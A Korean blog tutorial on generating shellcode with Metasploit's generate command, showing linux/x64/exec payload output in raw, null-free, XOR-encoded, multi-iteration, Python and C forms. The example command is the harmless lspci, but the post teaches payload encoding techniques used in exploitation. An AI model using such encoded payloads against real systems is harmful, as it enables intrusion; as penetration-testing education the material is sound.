| | at : |
Archive

[METASPLOIT] Metasploit에서 generate 명령을 통해 payload 생성하기(generate shellcode on metasploit) 하훌 rwxr-xr-x 0 10/14/2015



[METASPLOIT] Metasploit에서 generate 명령을 통해 payload 생성하기(generate shellcode on metasploit)

Permission rw-r--r--
Author 하훌
Date and Time 10/14/2015
Label
License 크리에이티브 커먼즈 라이선스


msf에서는 공격에 사용되는 shell을 code 형태로 나타낼 수 있는 기능이 있습니다.
바로 generate 명령입니다. 이 명령을 통해 shellcode를 육안으로 보고 복사하여 사용할 수 있게 하는 좋은 기능입니다.


payload 지정 후 generate 명령으로 shellcode 출력


hahwul #> use payload/linux/x64/exec
hahwul payload(exec) #>
hahwul payload(exec) #>
hahwul payload(exec) #> show options

Module options (payload/linux/x64/exec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD                    yes       The command string to execute

generate 옵션 확인
hahwul payload(exec) #> generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding.
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -f <opt>  The output file name (otherwise stdout)
    -h        Help banner.
    -i <opt>  the number of encoding iterations.
    -k        Keep the template executable functional
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The Platform for output.
    -s <opt>  NOP sled length.
    -t <opt>  The output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,psh-cmd,vba,vba-exe,vba-psh,vbs,war
    -x <opt>  The executable template to use

CMD를 lspci로 설정 후 generate 명령을 통해 shell code 확인하기
hahwul payload(exec) #> set CMD lspci
CMD => lspci
hahwul payload(exec) #> generate
# linux/x64/exec - 45 bytes
# http://www.metasploit.com
# VERBOSE=false, PrependFork=false, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=false, CMD=lspci
buf =
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00" +
"\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8" +
"\x06\x00\x00\x00\x6c\x73\x70\x63\x69\x00\x56\x57\x48\x89" +
"\xe6\x0f\x05"
hahwul payload(exec) #>

옵션을 활용한 정교한 shellcode generate




-b 옵션을 통해 제거해야할 데이터가 있다면 제거합니다.
예시로는 \x00 을 제거하면 아래와 같이 \x00이 제거된 코드로 나타나게됩니다.

hahwul payload(exec) #>generate -b '\x00'
# linux/x64/exec - 87 bytes
# http://www.metasploit.com
# Encoder: x64/xor
# VERBOSE=false, PrependFork=false, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=false, CMD=lspci
buf =
"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef" +
"\xff\xff\xff\x48\xbb\xc2\x4b\xf7\xf3\x14\x43\x3d\x2c\x48" +
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xa8\x70\xaf" +
"\x6a\x5c\xf8\x12\x4e\xab\x25\xd8\x80\x7c\x43\x6e\x64\x4b" +
"\xac\x9f\xde\x77\x43\x3d\x64\x4b\xad\xa5\x1b\x12\x43\x3d" +
"\x2c\xae\x38\x87\x90\x7d\x43\x6b\x7b\x8a\xc2\x11\xfc\x11" +
"\x43\x3d\x2c"
hahwul payload(exec) #>

-e 옵션을 통해서는 encoder를 지정할 수 있습니다.
x86/shikata_ga_nai 가 좋지만, 위 설정에서 64비트 기준으로 하였기에 간단한 xor encoder를 이용하겠습니다.

hahwul payload(exec) #> generate -e x64/xor
# linux/x64/exec - 87 bytes
# http://www.metasploit.com
# Encoder: x64/xor
# VERBOSE=false, PrependFork=false, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=false, CMD=lspci
buf =
"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef" +
"\xff\xff\xff\x48\xbb\x94\x05\xbe\x56\x5a\x0d\x93\xa2\x48" +
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xfe\x3e\xe6" +
"\xcf\x12\xb6\xbc\xc0\xfd\x6b\x91\x25\x32\x0d\xc0\xea\x1d" +
"\xe2\xd6\x7b\x39\x0d\x93\xea\x1d\xe3\xec\xbe\x5c\x0d\x93" +
"\xa2\xf8\x76\xce\x35\x33\x0d\xc5\xf5\xdc\x8c\x58\x59\x5f" +
"\x0d\x93\xa2"
hahwul payload(exec) #>

-f 옵션을 통해서 데이터로 쓸 수도 있구요.
hahwul payload(exec) #>generate -b '\x00' -e x64/xor -f ./test.shell
[*] Writing 701 bytes to ./test.shell...
hahwul payload(exec) #>

-i 옵션을 통해서 여러번 처리할 수 있습니다.

hahwul payload(exec) #> generate -b '\x00' -i 4
# linux/x64/exec - 207 bytes
# http://www.metasploit.com
# Encoder: x64/xor
# VERBOSE=false, PrependFork=false, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=false, CMD=lspci
buf =
"\x48\x31\xc9\x48\x81\xe9\xeb\xff\xff\xff\x48\x8d\x05\xef" +
"\xff\xff\xff\x48\xbb\xfe\x1e\x65\x70\xde\x25\xc7\x50\x48" +
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xb6\x2f\xac" +
"\x38\x5f\xcc\x37\xaf\x01\xe1\x2d\xfd\xdb\xca\x38\xaf\x01" +
"\x56\xde\xb2\x2f\xd9\xb1\xb8\x0a\xef\xec\x38\xef\x7d\xe0" +
"\x18\xd3\xe6\x9a\x8f\x21\xc7\x33\xda\x3e\x2b\x5b\x19\xc3" +
"\x21\xb1\x6d\xf0\xaa\x9e\x9d\xc5\x2b\xb1\x6d\x47\x59\x3b" +
"\x2c\x66\x87\xab\xda\x69\xe9\x5b\xa9\x72\xf3\x06\xbf\xf7" +
"\x1d\xec\x67\xc8\x20\x2e\x17\x8a\xf9\x77\x39\xb6\x20\x99" +
"\xd9\x0b\x3c\xf3\x3f\xb3\x20\x99\x6e\xf8\x23\xc4\x49\xae" +
"\x3d\xe8\x40\x3f\xf9\xc7\x88\x6b\x97\x4b\xde\xbc\x4e\x09" +
"\x32\xb8\x27\x6f\xe7\x38\x1b\xc3\x99\x52\x24\x3a\x90\xd2" +
"\x3b\x78\xe5\x78\xc4\xb3\xd7\x8c\x30\x78\xb6\x78\xc4\xb2" +
"\xed\x49\x55\x78\xb6\x30\x21\x27\xcf\xc2\x3a\x78\xe0\x67" +
"\x05\xdd\x59\xae\x56\x78\xb6\x30\xdf\x4e\x50"

msfpayload 는 여러 옵션을 포맷을 지원하기에 -t 옵션으로 type 을 지정할 수 있습니다.
hahwul payload(exec) #> generate -b '\x00' -t python
# linux/x64/exec - 87 bytes
# http://www.metasploit.com
# Encoder: x64/xor
# VERBOSE=false, PrependFork=false, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=false, CMD=lspci
buf =  ""
buf += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xc1\x50\xbb\x1a\xa4\x7c\xa3"
buf += "\xab\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\xab\x6b\xe3\x83\xec\xc7\x8c\xc9\xa8\x3e\x94\x69\xcc"
buf += "\x7c\xf0\xe3\x48\xb7\xd3\x37\xc7\x7c\xa3\xe3\x48\xb6"
buf += "\xe9\xf2\xa2\x7c\xa3\xab\xad\x23\xcb\x79\xcd\x7c\xf5"
buf += "\xfc\x89\xd9\x5d\x15\xa1\x7c\xa3\xab"
hahwul payload(exec) #> generate -b '\x00' -t c
/*
 * linux/x64/exec - 87 bytes
 * http://www.metasploit.com
 * Encoder: x64/xor
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependSetresgid=false, PrependSetregid=false,
 * PrependSetgid=false, PrependChrootBreak=false,
 * AppendExit=false, CMD=lspci
 */
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\x9f\x84\x06\xdd\x08\xb0\xb7\x8d\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xf5\xbf\x5e\x44\x40\x0b"
"\x98\xef\xf6\xea\x29\xae\x60\xb0\xe4\xc5\x16\x63\x6e\xf0\x6b"
"\xb0\xb7\xc5\x16\x62\x54\x35\x0e\xb0\xb7\x8d\xf3\xf7\x76\xbe"
"\x61\xb0\xe1\xda\xd7\x0d\xe0\xd2\x0d\xb0\xb7\x8d";
hahwul payload(exec) #>

Share







HAHWUL
HACKING | PENETRATION-TEST | CODING
HACKERONE : GIT : 0DAY-TODAY : EXPLOIT-DB : PACKETSTORM
GOOGLE+ | HAHWUL@GMAIL.COM | TWITTER
WWW.HAHWUL.COM




0 개의 댓글:

댓글 쓰기